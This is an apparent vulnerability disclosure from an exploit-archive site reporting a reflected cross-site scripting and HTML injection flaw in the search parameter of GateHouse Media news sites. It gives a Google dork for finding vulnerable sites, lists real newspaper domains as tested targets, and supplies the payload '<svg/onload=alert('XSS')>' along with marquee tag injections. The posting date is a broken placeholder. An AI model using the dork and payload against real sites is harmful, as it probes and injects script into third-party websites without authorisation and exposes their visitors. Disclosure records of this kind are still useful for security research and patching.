GateHouse Media LLC - XSS
Posted on 30 November -0001
<HTML><HEAD><TITLE>GateHouse Media LLC - XSS</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY><------------------ header data start ------------------- > ############################################################# # Application Name : GateHouse Media, LLC - XSS # Vulnerable Type : Cross Site Scripting & HTML Ä°njection # Author: Cyber Warrior | Pentester | Bug Researchers Group # Date: 13.12.2016 # Tested on: Windows 8.1 / Google Chrome / Mozilla Firefox # Google Dork: intext:"Copyright 2006-2016 GateHouse Media, LLC. Some rights reserved" inurl:search?q= # Vulnerable Parameter: GET /search?q= # XSS: Http://localhost/search?q=<svg/onload=alert('XSS')> # Tested On Demo Sites: http://www.theledger.com/search?q= http://www.theledger.com/search?q= http://www.mailtribune.com/search?q= < ------------------- header data end of ------------------- > < -- bug code start -- > <svg/onload=alert('XSS')> <marquee>Bug Researchers</marquee> <marquee onmouseout="this.start();" onmouseover="this.stop();"> Bug Researchers </marquee> < -- / bug code end of -- > </BODY></HTML>
